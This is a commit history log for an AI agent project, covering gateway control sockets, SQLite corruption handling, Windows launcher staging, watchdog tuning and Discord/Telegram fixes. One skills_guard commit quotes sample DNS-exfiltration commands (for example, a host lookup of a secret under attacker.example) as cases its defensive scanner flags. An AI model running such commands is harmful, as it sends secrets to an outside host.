Commit Graph

28271 Commits

Author SHA1 Message Date
Teknium d1c84fc5d3 test(gateway): live Windows named-pipe E2E for the control socket (wine2e lane)
Real child process binding the real pipe via the proactor loop with the
default handlers; real sync client; real collect_fleet_versions consumer;
kill-and-fallback proof. Skipped everywhere except a real Windows host.
2026-08-22 16:45:00 -07:00
Teknium 60b6269142 feat(gateway): gateway-owned control socket — identify/status verbs, fleet consumers prefer it over scans (#92091 step 1)
The gateway now creates a local control socket at startup (Unix domain
socket at $HERMES_HOME/gateway.sock with a pointer-file fallback for
long paths; named pipe on Windows) and answers versioned JSON verbs:

- identify: pid, profile, hermes_home, code_sha/code_version (#91283
  stamps, now queryable live), self-declared supervisor kind, start_time
- status: the live runtime-status payload, answered by the process itself

Bound immediately after the PID-file O_EXCL claim (the moment the
process becomes the authoritative gateway for its HERMES_HOME), removed
on clean shutdown; a successor clears any stale socket on bind. Strictly
non-fatal: bind failure only means consumers use the old path.

Consumers migrated (observability only, scan layer demoted to fallback,
never deleted):
- collect_fleet_versions() (post-update fleet matrix): prefers a live
  identify answer over gateway_state.json; entries carry source=socket
- collect_runtime_inventory() (hermes update --plan): prefers the
  socket, and takes the gateway's own supervisor declaration instead of
  inferring it from PID scans

Old gateways mid-upgrade, crashed processes, and bind failures behave
exactly as before. Never a TCP port; filesystem/pipe ACLs are the auth
boundary (0600 socket).

Part of #91277 (fleet-update reliability). Design: #92091.
2026-08-22 16:45:00 -07:00
kshitij 987064caa4 fix: restore generic corruption match in FTS self-heal
The PR narrowed _is_fts_write_corruption_error to only match FTS5-specific
'fts5: corrupt structure record' errors, dropping the generic 'database disk
image is malformed' match. But FTS shadow table corruption (the common case)
raises the generic error on SQLite < 3.53, not the FTS5-specific one. This
broke FTS self-heal for 10 existing tests and for users on older SQLite.

Restore the generic match via is_malformed_db_error. Safety is preserved
because the FTS rebuild only touches derived indexes — if the damage is
actually in a canonical B-tree, the rebuild itself fails and the write
propagates.

Also restore the original test assertion and remove the
test_generic_malformed_write_fails_closed test whose premise (generic
corruption should not trigger FTS rebuild) was wrong for the FTS self-heal
path.
2026-08-23 02:55:03 +05:30
Bruce Xu 50bbcbf2b4 fix(state): fail closed on unscoped SQLite corruption 2026-08-23 02:55:03 +05:30
kshitij c80a0a551c Merge pull request #92529 from kshitijk4poor/chore/author-map-brucexu-eth
chore: AUTHOR_MAP brucexu-eth
2026-08-23 02:49:46 +05:30
kshitij 85044caebe chore: AUTHOR_MAP brucex2710@gmail.com -> brucexu-eth
For salvage PR #92523 (PR #91585 by @brucexu-eth).
2026-08-23 02:46:59 +05:30
sovthpaw 13f4cfebfa fix(skills_guard): --host flags no longer flagged as DNS exfiltration
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.

Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
2026-08-22 11:15:44 -07:00
emozilla 0605279b35 test: guard os.geteuid() for Windows in the ACP launcher tests
os.geteuid() does not exist on Windows, so collecting the module
crashed with AttributeError before any test ran. Branch on
hasattr(os, "geteuid") the same way the code under test does.
2026-08-22 13:39:04 -04:00
emozilla 5d5179d7a9 fix(windows): remove the hermes launchers on uninstall
Every uninstall mode deletes the code checkout, but the launchers in
the managed binary dir (%LOCALAPPDATA%\hermes\bin) live outside it and
survived -- so `hermes` in a new terminal resolved to a launcher whose
venv target was gone and errored, which reads worse than
command-not-found.

remove_windows_bin_launchers deletes both launcher forms (.exe/.cmd)
from the managed binary dir in every uninstall mode, anchored on the
default Hermes root so profile sessions cannot redirect the sweep into
profiles\<name>\bin. When the uninstall itself runs through the
launcher, that exe is mandatory-locked against deletion but not rename
(the same fact _quarantine_running_hermes_exe relies on), so it falls
back to renaming the launcher aside.

The managed uv (uv*.exe) in the same dir survives, and the hermes\bin
PATH entry is swept only on a full wipe from the default root
(include_managed_bin) -- a keep-data uninstall keeps the still-working
uv resolvable for reinstalls.

A lockstep test parses install.ps1's staging loop so the swept names
cannot drift from the staged names silently.
2026-08-22 13:39:04 -04:00
emozilla 679e9cd294 fix(windows): stage hermes launchers in the managed binary dir, not the git checkout
The installer staged the hermes/hermes-acp launcher copies at
hermes-agent\bin -- inside the git working tree -- and put that dir on
the user PATH (#84452). The update command's pre-pull autostash
(git stash push --include-untracked) swept those untracked, unignored
copies off disk, and once the desktop updater stopped re-applying
stashes (--keep-stash, 5dd221d442) nothing restored them: `hermes`
stopped resolving in every new terminal on every desktop-updated
install.

Move the canonical launcher home to the managed binary dir
(%LOCALAPPDATA%\hermes\bin, next to the managed uv) -- outside the
checkout, where no git operation can ever touch it. The dir is
per-machine and shared by every profile, so all anchoring uses
get_default_hermes_root(), never HERMES_HOME (which points inside
profiles\<name> under `hermes -p`).

The copy design also had a second latent break: managed-uv rebuilds
create relocatable venvs, and a relocatable venv's exe trampoline
resolves relative to its own location -- a copy outside venv\Scripts
dies with 'uv trampoline failed to canonicalize script path'. Launcher
form now depends on the venv (lockstep in install.ps1 and
_install_repair.py): exe copy for normal venvs, a .cmd delegator
invoking the in-venv exe by absolute path for relocatable ones. Either
form counts as present, so pre-rebuild exe copies are left alone.

Delivery to the existing fleet, per cohort:

- already-broken installs cannot run the CLI, so an import-time heal in
  hermes_cli.main (ensure_windows_bin_launchers) re-stages missing
  launchers when the desktop app spawns its backend -- the one channel
  that still reaches them. Gates fail toward inaction: canonical dir
  only for the managed clone, legacy hermes-agent\bin only while the
  user PATH still resolves through it (some pre-managed-uv installs
  have no hermes\bin PATH entry; the legacy re-stage is what fixes
  those). Staging-name + os.replace keeps concurrent process starts
  from tearing a launcher; the helper never raises.
- healthy old-layout installs migrate in the update tail
  (migrate_windows_bin_path): stage canonical launchers, verify them
  BEFORE touching the registry, prepend hermes\bin to the user PATH,
  strip the legacy entries (hermes-agent\bin and venv\Scripts, #83797),
  preserving REG_EXPAND_SZ and raw %VARS%. The legacy dir's files stay
  on purpose -- configs holding absolute launcher paths keep working;
  only the sweepable PATH resolution route goes.
- fresh installs get the new layout from install.ps1 directly.

/bin/ is gitignored so the one update that DELIVERS this fix cannot
sweep pre-migration launchers a final time under the old rules; the
gitignore line, the legacy re-stage branch, and the update-tail call
are transition machinery with a named expiry once the fleet has
migrated.

Also rewrites _ensure_acp_launcher's stale Windows paragraph to match
(raw docstring fixes its invalid \S escape) and updates the Windows
native docs to the new layout, with a docs<->installer parity test.
2026-08-22 13:38:56 -04:00
Teknium 0cde4dd93a chore: add contributor email mapping for EAbaracus 2026-08-22 10:38:27 -07:00
Teknium db7dda468f chore: anchor artifact ignore rules to repo root; block them from Docker image layers
Follow-up to the cherry-picked cleanup: the default.tar.gz profile export
was also carried into published container images by the Dockerfile's
'COPY . .' layer because .dockerignore had no matching pattern. Anchor
the .gitignore rules to repo root (per review feedback on #91712) and
add the same set + /*.tar.gz to .dockerignore so root archives can never
reach an image layer again.
2026-08-22 10:38:27 -07:00
EAbaracus 0af2858a3a chore: remove committed root artifacts (log.txt, sqlite_leak_fix.png, default.tar.gz)
These were committed to the repo root but are build/debug byproducts:
- log.txt: empty 0-byte file
- sqlite_leak_fix.png: unreferenced 832KB image
- default.tar.gz: 1.96MB, only used as a test fixture OUTPUT (tests write it
  to a temp dir, never read from repo root)

Add ignore rules so they cannot be re-committed. Part of audit cleanup
(HA-D11-001 / HA-D3-001).
2026-08-22 10:38:27 -07:00
hermes-seaeye[bot] 4b860d8193 fmt(js): npm run fix on merge (#92399)
Co-authored-by: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
2026-08-22 17:34:58 +00:00
Teknium c0055b3a6d chore: map contributor email for Jackal991 2026-08-22 10:30:46 -07:00
Jackal991 67a5d7bcf0 fix(desktop): resolve Win10 translucency defaults from platform, not glass capability
Closes #90824
2026-08-22 10:30:46 -07:00
Teknium 40f3e58f6d fix(desktop): stop manufacturing duplicate toolCallIds at the fold, repair poisoned cached tails
Two follow-up layers on top of the salvaged runtime-boundary guard (#87871):

- coalesceToolOnlyAssistants now folds via concatToolPartsUnique, dropping an
  incoming tool-call part whose toolCallId the predecessor already carries.
  Two individually-clean rows sharing an id (structural carry-over re-attaching
  a cached row's calls) no longer become one crashing message — and no longer
  render the same call twice. Root-cause analysis by @marketing2981 (#87857).
- loadTranscriptTail repairs a poisoned persisted tail on read; installs
  already carrying a duplicate in hermes.transcript-tail.v1:* stop
  crash-looping after upgrade instead of re-deriving the same collision
  every launch.
- Regression tests for all three layers, incl. the end-to-end repository link
  test (from #92093 by @RasputinKaiser) and the cross-message ids-stay-
  untouched contract (per-response tool numbering, e.g. Kimi — #90545 by
  @M7MMAD-OMAR). Each test sabotage-verified against its reverted layer.
2026-08-22 10:30:31 -07:00
PRATHAMESH75 9f8dca34dc fix(desktop): dedupe duplicate toolCallId parts at the runtime boundary (#87857)
A message whose content carries two tool-call parts with the same
toolCallId makes assistant-ui's useResources throw
"Duplicate key toolCallId-<id> in useResources", which the workspace
error boundary turns into a renderer crash loop that blanks the window.
The existing withUniqueToolCallIds dedup runs only on the static
toChatMessages output; the streaming reducer (which can append the same
tool-call part twice under an optimistic-update ordering) and tool-only
assistant coalescing both reach the runtime without passing through it.

Add withUniqueToolCallIdsWithinMessage and apply it in
useRuntimeMessageRepository, the single ChatMessage->ThreadMessage
boundary shared by the static and streaming paths, right where the
repeated-message.id guard already lives. The dedup is per-message (the
assistant-ui key space is per-message) and returns the same reference
when clean, so the repository's identity cache is untouched in the
common no-duplicate case.
2026-08-22 10:30:31 -07:00
poisdahl a36d6704b6 Merge remote-tracking branch 'origin/main' into agent/81234-merge-20260821 2026-08-22 17:31:04 +02:00
poisdahl fd41164861 fix(history): keep carrier rewinds race-safe after refresh 2026-08-22 17:30:35 +02:00
Kshitij Kapoor 999703fd43 refactor(gateway): hoist watchdog constants to the canonical import; drop dead or-fallbacks
/simplify-code quality reviewer: _start_loop_liveness_guards re-imported
the DEFAULT_LOOP_WATCHDOG_* constants locally although the file's
canonical shutdown_watchdog import block already exists, and the
'or DEFAULT' guards re-clamped values GatewayConfig.from_dict already
validates — unreachable for config-loaded values. getattr defaults keep
the config=None test path working.
2026-08-22 20:40:23 +05:30
Kshitij Kapoor 8ee0103ea2 fix(gateway): finite-bounded watchdog knob validation + wire keys through load_gateway_config
Addresses both review findings from @egilewski on #89134:

- Non-finite values: _coerce_int now degrades int(inf) (OverflowError
  previously ABORTED gateway config loading); the clamp requires
  math.isfinite plus sane upper bounds (interval <=3600s, timeout
  <=600s, strikes <=1000), falling back to the shutdown_watchdog
  constants.
- Loader wiring: load_gateway_config builds gw_data FLAT and never
  forwarded the yaml gateway: section, so loop_watchdog* keys —
  including the PRE-EXISTING loop_watchdog bool documented in
  config_defaults — were silently ignored on the real startup path.
  Bridged with the established top-level-wins/nested-fallback pattern.

E2E: config.yaml with loop_watchdog:false + strikes:12 + interval:.inf
now yields False/12/30.0 through the real loader.
2026-08-22 20:40:23 +05:30
Kshitij Kapoor 3616145723 fix(gateway): keep loop-watchdog default at 3 strikes; dedupe constants; register knobs in config defaults
Downscope of the salvaged #89134 per review: the 3->8 default raise was
symptom tolerance for the false-positive class the off-loop heartbeat +
two-witness probe fixes at the root — fleet-wide it would only delay
genuine-wedge recovery ~2.7x. The three tuning knobs keep independent
operator value and stay:

- default max_strikes back to 3 everywhere (constant, dataclass,
  from_dict fallback, floor clamp, tests)
- gateway/config.py + gateway/run.py now reference the
  shutdown_watchdog DEFAULT_* constants instead of duplicating literals
  in three places (drift hazard)
- knobs registered in hermes_cli/config_defaults.py alongside the
  sibling gateway.loop_watchdog bool
2026-08-22 20:40:23 +05:30
devops aa08cb8ccb fix(gateway): make loop-liveness watchdog tolerant of transient reconnect stalls
The event-loop liveness watchdog (gateway.shutdown_watchdog) hard-exited with
code 75 after 3 consecutive missed probes (probe_interval=30s, timeout=10s,
max_strikes=3), i.e. ~90-120s of loop block. Telegram/Discord reconnect during
a network blip does synchronous socket I/O on the loop and can block it for
60-90s; these stalls self-recover (recurring fleet incidents on 2026-08-17
stalled cron dispatch ~21h via restart churn, kanban t_0f76430f).

Raise the default max_strikes 3->8 so a transient reconnect stall is tolerated
while a genuine multi-minute wedge still escalates, and expose the three
tolerance knobs via config.yaml (gateway.loop_watchdog_probe_interval_s /
_probe_timeout_s / _max_strikes) so operators can tune per deployment.

Refs: kanban t_70483f23
2026-08-22 20:40:23 +05:30
poisdahl ebae0064a2 fix(compression): preserve live assistant carriers after refresh 2026-08-22 16:48:57 +02:00
poisdahl a5b326a471 Merge remote-tracking branch 'origin/main' into agent/81234-merge-20260821
# Conflicts:
#	tests/agent/test_reference_handoff_active_turn.py
2026-08-22 16:47:39 +02:00
kshitij 261a4efb90 Merge pull request #92214 from kshitijk4poor/discord-picker-constants-followup
refactor(discord): derive picker capacity constants; drop last bare 25-option literal
2026-08-22 16:35:15 +05:30
kshitij 667c787a1c Merge pull request #92216 from kshitijk4poor/fix/p1-gateway-simplify-followups
fix(gateway): close the boot-send TOCTOU replay window + P1-batch simplify follow-ups
2026-08-22 16:30:55 +05:30
Kshitij Kapoor a18f90847b refactor(gateway): promote parse_systemd_duration_to_us to public
hermes_cli/gateway.py's restart-wait sizing (from #92175) was the only
cross-module import of an underscore-private shutdown_forensics helper.
Promote it (private alias retained for existing patchers).
2026-08-22 16:26:51 +05:30
Kshitij Kapoor 1db0a7d825 refactor(telegram): share the flood-wait cap between send and edit paths
Extract _FLOOD_INLINE_WAIT_CAP_SECS + _flood_cap_result so the 5s cap
and the flood_control:{wait} error contract cannot drift between the
edit path and the send path #92173 added.
2026-08-22 16:26:51 +05:30
Kshitij Kapoor bdd281d078 refactor(gateway): route kanban notifier writer offloads through _to_thread_process_service
The notifier watcher offloads the same class of guarded Kanban writers
(_kanban_advance/_kanban_rewind/_kanban_unsub) as the dispatcher ticks
that #92172 wrapped. Apply the same offload-boundary scrub to all 10
writer sites for uniform defense-in-depth (read-only _collect stays on
bare to_thread), and reword the helper docstrings to state the
defense-in-depth relationship to spawn isolation accurately.
2026-08-22 16:26:51 +05:30
Kshitij Kapoor 684e95a001 fix(gateway): claim ledger rows and clear resume_pending inline before the abandonable boot-send task
Post-merge follow-up to #92173. The claim + resume-clear lived inside
the boot-send task AFTER the restart notification — itself a
flood-controllable send. If that notification outlived the restore-gate
timeout, the gate opened with zero rows claimed and the resume
scheduler replayed turns whose answers were already in the ledger,
while the background task later redelivered them too (duplicate
delivery + re-paid turn).

Split _redeliver_pending_obligations into _claim_pending_obligations
(pure DB: sweep + resume clear, awaited inline before the send task
exists) and _redeliver_claimed_obligations (network half, stays inside
the bounded task). The original name remains as a composition wrapper.
Mutation-checked: both updated gate tests fail on pre-split run.py.
2026-08-22 16:26:51 +05:30
kshitijk4poor 9154421b11 refactor(discord): use _DISCORD_SELECT_MAX_OPTIONS in ChoicePickerView
Final-review follow-up: swap the bare [:25] slice for the new constant.
Behavior-identical (same 25); removes the last bare option-cap literal
in the file. ChoicePickerView feeds finite /reasoning and /fast choice
lists, so no functional change.
2026-08-22 16:23:39 +05:30
kshitijk4poor c925cc8eb8 refactor(discord): derive model-select capacity from the row/option constants
Final-review follow-up: replace the bare 75 in the shown-count with
_DISCORD_MODEL_SELECT_CAPACITY so it can never desync from what the
partitioned menus actually render.
2026-08-22 16:23:39 +05:30
kshitijk4poor 4a6b362178 review follow-up: trim overreaching comment sentence, pin durable-copy assertion
- Drop the 'aborted before its tail' no-op sentence: early aborts are
  intercepted by the aborted/no-progress branches and never reach the
  would-grow check, so the framing overstated its relevance (2c finding).
- Test now also asserts the durable model_config copy still holds the
  armed runway after the refusal — locking in the memory==disk half of
  the contract, not just the in-memory value.
2026-08-22 16:07:12 +05:30
kshitijk4poor 4c76ec81a9 fix(compression): restore the prune runway when a would-grow refusal keeps the transcript
compress()'s successful tail zeroes _proactive_prune_rearm_tokens in
memory — correct for a committed compaction, whose boundary already broke
the prompt-cache prefix. But compress_context's anti-growth guard can then
REFUSE the result and keep the original transcript, whose cached prefix is
intact. The refusal returned with the in-memory runway still at 0 while the
durable model_config copy kept the old value, so:

- the next eligible iteration's proactive prune fired without the regrowth
  interval #79640 introduced — an immediate, unthrottled cache-breaking
  rewrite (#91830's bug class), and
- memory and disk disagreed until a restart silently re-armed the throttle
  from the stale durable row.

The refusal branch now restores the runway from the attempt snapshot — the
same targeted restore the rotation-failure rollback already performs.

Sibling non-commit branches audited: aborted (returns before the tail
zero), no-progress (tail zero only runs after a real boundary rewrite,
which no-progress by definition lacks), empty-transcript (built-in tail
never returns []), fence-denied (full snapshot restore already covers the
runway), in-place DB failure (in-memory transcript keeps the compacted
form, so the zeroed runway is consistent with it).

Fixes the reachable half of the structural asymmetry flagged in #91830.
2026-08-22 16:07:12 +05:30
fangliquan a4f16e3fef fix(gateway): retain failed replacement evidence 2026-08-22 15:27:26 +05:30
fangliquan 596bfc557f fix(gateway): distinguish failed systemd replacements 2026-08-22 15:27:26 +05:30
fangliquan 83b09ebd0a fix(gateway): make handoff recovery idempotent 2026-08-22 15:27:26 +05:30
fangliquan 91fb175188 fix(gateway): preserve systemd handoff recovery 2026-08-22 15:27:26 +05:30
fangliquanflq 5b024c7ccc fix(gateway): make systemd the sole restart owner 2026-08-22 15:27:26 +05:30
fangliquan f12cd04015 fix(gateway): isolate kanban dispatcher to_thread context
Spawn-time Context isolation cannot rewrite an already-running watcher task. Run dispatcher SQLite offloads in an empty Context so write_txn no longer false-trips after delegate_task, while real child callers still hit the mutation guard.
2026-08-22 15:25:50 +05:30
fangliquan bf3a0bb99d fix(gateway): isolate supervised watcher contexts 2026-08-22 15:25:50 +05:30
Jack Lau e173720774 fix(gateway): give supervision exhaustion an owner for queued platforms
Review of #90448 by @andrexibiza: adding _ensure_reconnect_watcher_running()
to the already-queued branch of a fatal callback is still an event-coupled
check. It needs a later fatal error from some other platform to arrive, and
#81036 makes that less likely rather than more -- it publishes the queue
before disconnect and drops the failed adapter from the live map, so after
the watcher's supervised restart budget is spent there may be no adapter
left to emit the event recovery is waiting on.

That is the state #72366 (salvage of #71867 by @ygd58) restored supervision
to close: queued work exists, the watcher is dead, and nobody owns the
invariant. Supervision being finite is correct; having no owner past the
budget is not.

_spawn_supervised now takes on_give_up, invoked when it abandons a task --
the supervisor is the only thing that knows it has. The reconnect watcher
uses it to hold:

  while _running and _failed_platforms is non-empty, either a reconnect
  watcher is live or a bounded respawn is scheduled.

Empty queue: leave it down and log; the enqueue path spawns a fresh watcher
the moment something depends on one. Non-empty: a bounded slow tier at
_RECONNECT_WATCHER_SLOW_RETRY_SECS (300s) for _MAX_SLOW_WATCHER_RESPAWNS (6)
attempts, standing down early if the queue drains or a watcher returns on
its own. Exhausted: one loud error naming the platforms left unattended.

The ceiling is (1 + _MAX_SUPERVISED_RESTARTS) x (1 + _MAX_SLOW_WATCHER_RESPAWNS)
spawns -- 42 across at least half an hour -- because each slow attempt hands
the watcher a fresh supervised budget. A test asserts that ceiling so it
cannot quietly become a restart loop.

Deliberately NOT included: requesting a process restart when the slow tier
is also exhausted. Taking down every healthy platform to heal a sick one is
a blast-radius policy decision for a maintainer.

Two things this turned up:

- _spawn_supervised did not thread on_give_up through its own backoff
  respawn, so the callback was lost after the first restart and the give-up
  branch had no owner at exactly the moment it needed one -- the same defect
  the on_spawn docstring warns about, one parameter over.
- Three call sites repeated the (factory, name, on_spawn) triple, whose
  on_spawn half is load-bearing. They now go through
  _spawn_reconnect_watcher().

_supervised_backoff() names the previously-inline exponential schedule so
the exhaustion tests can collapse it; production behaviour is unchanged.

Refs #90386
2026-08-22 15:25:45 +05:30
Jack Lau 92018e76a8 fix(gateway): heal a dead reconnect watcher when the platform is already queued
_ensure_reconnect_watcher_running() exists for one situation: the reconnect
watcher has exhausted _MAX_SUPERVISED_RESTARTS, so _spawn_supervised has logged
"giving up restarts" and will never bring it back on its own (#70344, and the
supervised-restart half of #71758). It had exactly one call site, inside the
newly-queued branch of _queue_retryable_fatal_platform.

That branch is unreachable for a platform already in _failed_platforms, which
is the only kind of platform the watcher can have been retrying long enough to
burn five rapid restarts on. So the backstop could not fire in the one state it
was written for.

The failure is silent by construction. The early return logs nothing, so there
is no "queued for background reconnection" line. The stranded check in
_handle_adapter_fatal_error_detached deliberately treats a queued platform as
safe, so the gateway does not exit for the service manager either. With another
platform still connected, self.adapters is non-empty and the "gateway staying
alive, watcher will retry in background" branch is skipped too. A retryable
fatal error can therefore produce a single ERROR line and then nothing: the
platform sits in the queue that nobody is draining until someone restarts the
process by hand (#90386 reports 4h17m of that, with cron unaffected throughout).

Call the ensure on the already-queued path as well. It is already idempotent
and already cheap: it returns immediately unless the tracked task is done, and
it routes through the same on_spawn handle tracking, so a live watcher is never
duplicated.

The queue entry itself is deliberately left untouched. Re-enqueueing would
reset attempts and next_retry, restarting the backoff ladder on every fatal
error and hammering a provider that is already refusing the connection.
2026-08-22 15:25:45 +05:30
liuhao1024 349d9aee43 fix(tui): log the refused shared-handle transfer and pin _get_db caching 2026-08-22 15:25:35 +05:30
liuhao1024 bd2afde48f fix(tui): never transfer the shared launch SessionDB to one agent
The eager session.resume path called _transfer_db_to_agent(agent, db)
unconditionally. With no non-launch profile selected, db resolves to the
SHARED launch handle (_get_db()), so the transfer succeeded on identity
alone — the agent IS holding that handle — and session.close() then
closed the process-wide database under every unrelated session:
subsequent writes failed with "'NoneType' object has no attribute
'execute'" and the Desktop could not open chats until restart (#91610).
This directly violated _transfer_db_to_agent's own contract ("Never
called for the shared launch handle", introduced with the ownership
lifecycle in #81071).

Gate the transfer on owns_db (dedicated handles only), and add defense
in depth: _transfer_db_to_agent now refuses db is _get_db() even when a
caller invokes it incorrectly.
2026-08-22 15:25:35 +05:30
Kshitij Kapoor 41e29a601e fix(gateway): clear resume_pending for all claimed ledger rows before any redelivery send
Follow-up to the salvaged #91986: the per-row clear still left rows the
loop had not reached exposed — a slow send ahead of them could hold the
loop past the inbound-gate timeout and let
_schedule_resume_pending_sessions replay those turns. Clearing every
claimed row up front closes the duplicate window; claiming already
spent the redelivery attempt, so the ledger retry path is unchanged.
2026-08-22 15:25:30 +05:30
HexLab98 ce944a5a55 fix(gateway): do not let boot-path sends hold the inbound gate
Restart notification and obligation redelivery ran before the
startup-restore gate opened, so one hung Telegram send queued inbound
on every platform. Bound those sends with the same timeout the resume
gate already uses, and clear resume_pending before send so a timed-out
redelivery cannot also replay the turn.
2026-08-22 15:25:30 +05:30
HexLab98 a444b673ad fix(telegram): fail closed on long send-path flood waits
Telegram RetryAfter on send() slept the server retry_after with no
ceiling, so a 97-minute penalty pinned the coroutine. Mirror the edit
path: waits over 5s return immediately; short waits still retry inline.
2026-08-22 15:25:30 +05:30